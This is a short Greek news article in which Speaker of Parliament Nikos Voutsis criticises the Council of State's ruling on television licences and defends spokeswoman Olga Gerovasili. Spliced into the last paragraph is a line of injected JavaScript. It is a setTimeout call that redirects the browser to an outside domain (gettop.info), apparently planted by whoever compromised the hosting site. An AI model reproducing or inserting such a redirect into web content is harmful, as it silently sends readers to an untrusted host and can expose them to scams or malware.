Βούτσης: To ΣτΕ ευθυγραμμίστηκε με μια σαφή πολιτική θέση

0
9

 

«Μας προκαλεί αρνητική εντύπωση ότι το Συμβούλιο της Επικρατείας ευθυγραμμίστηκε με μια σαφή πολιτική θέση» τόνισε ο πρόεδρος της Βουλής Νίκος Βούτσης, μιλώντας στον ΣΚΑΪ.

Ο κ. Βούτσης, αναφερόμενος στη δήλωση της κυβερνητικής εκπροσώπου Ολγας Γεροβασίλη τόνισε: «Δεν είναι υβριστική η δήλωσή της γιατί αναφερόταν σε μια διαδρομή της περασμένης πενταετίας. Ξέρετε ότι η συνέχεια δεν είναι μόνο του κράτους αλλά και της εξουσίας».

Αναφερόμενος στη διάταξη που προανήγγειλλαν την Τετάρτη ο Νίκος Παππάς και η Όλγα Γεροβασίλη, ο πρόεδρος της Βουλής τη χαρακτήρισε ενδιάμεση λύση καθώς όπως είπε «είναι προφανές ότι δεν είναι αυτή η άποψη της κυβέρνησης ειδικά για το θέμα του αριθμού των αδειών».

Όσον αφορά για τα μέτωπα που έχει ανοίξει η κυβέρνηση για τις τηλεοπτικές άδειες είπε ότι «δεν ξέρω αν ήταν σοφή η επιλογή να στήσει καβγά για τις άδειες αλλά ηταν θέση της κυβέρνσης να προσπαθήσει να κάνει αυτό που έκανε σε ένα θέμα που όποιος πήγε να ασχοληθεί με αυτό κάηκε». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here